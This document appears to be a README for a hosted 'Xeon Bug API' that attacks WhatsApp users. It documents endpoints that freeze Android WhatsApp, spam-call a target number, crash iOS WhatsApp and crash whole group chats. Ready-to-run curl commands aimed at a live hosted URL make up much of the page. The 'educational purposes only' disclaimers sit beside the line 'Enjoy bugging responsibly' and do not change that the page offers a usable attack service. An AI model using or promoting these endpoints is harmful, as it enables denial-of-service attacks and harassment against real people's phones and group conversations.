The Xeon Bug API is a powerful endpoint API developed by Dream Guy Xeon to exploit vulnerabilities in WhatsApp. This API provides endpoints that can:
- 🛑 Delay WhatsApp on Android devices.
- 🌋 Spam Call Users on WhatsApp.
- 🍎 Crash WhatsApp on iOS devices.
- 💥 Crash entire WhatsApp group chats.
⚠️ Warning: This API is for educational purposes only. Misuse of this tool may result in serious legal consequences. Use responsibly.
- 🔥 Delay Android Devices
- 🕸️ Spam Call Users
- 🍏 Crash iOS Devices
- 💬 Crash Group Chats
Description: Delay and crashes WhatsApp on Android devices.
Endpoint:
GET ${api_link}/freezeDroid?target=${number}
Parameters:
Key | Type | Description |
---|---|---|
target |
String | The WhatsApp number to be targeted |
Description: Spam call users on WhatsApp.
Endpoint:
GET ${api_link}/callSpam?target=${number}
Parameters:
Key | Type | Description |
---|---|---|
target |
String | The WhatsApp number to be targeted |
Description: Crashes WhatsApp on iOS devices.
Endpoint:
GET ${api_link}/iosCrash?target=${number}
Parameters:
Key | Type | Description |
---|---|---|
target |
String | The WhatsApp number to be targeted |
Description: Crashes an entire WhatsApp group chat.
Endpoint:
GET ${api_link}/crashGroup?target=${grouplink}
Parameters:
Key | Type | Description |
---|---|---|
target |
String | The WhatsApp group chat link to target. |
Note:
This API is designed strictly for educational and research purposes to highlight vulnerabilities in applications. Any unauthorized use to harm individuals, groups, or organizations is strictly prohibited. Ensure you comply with all applicable laws before using this API.
# Delay Android WhatsApp
curl -X GET "https://xeon-bug-api.onrender.com/freezeDroid?target=1234567890"
# Spam Call User
curl -X GET "https://xeon-bug-api.onrender.com/callSpam?target=1234567890"
# Crash iOS WhatsApp
curl -X GET "https://xeon-bug-api.onrender.com/iosCrash?target=1234567890"
# Crash Group Chat
curl -X GET "https://xeon-bug-api.onrender.com/crashGroup?target=https://chat.whatsapp.com/exampleGroupLink"
👨💻 Developed By: Dream Guy Xeon
Enjoy bugging responsibly! ✨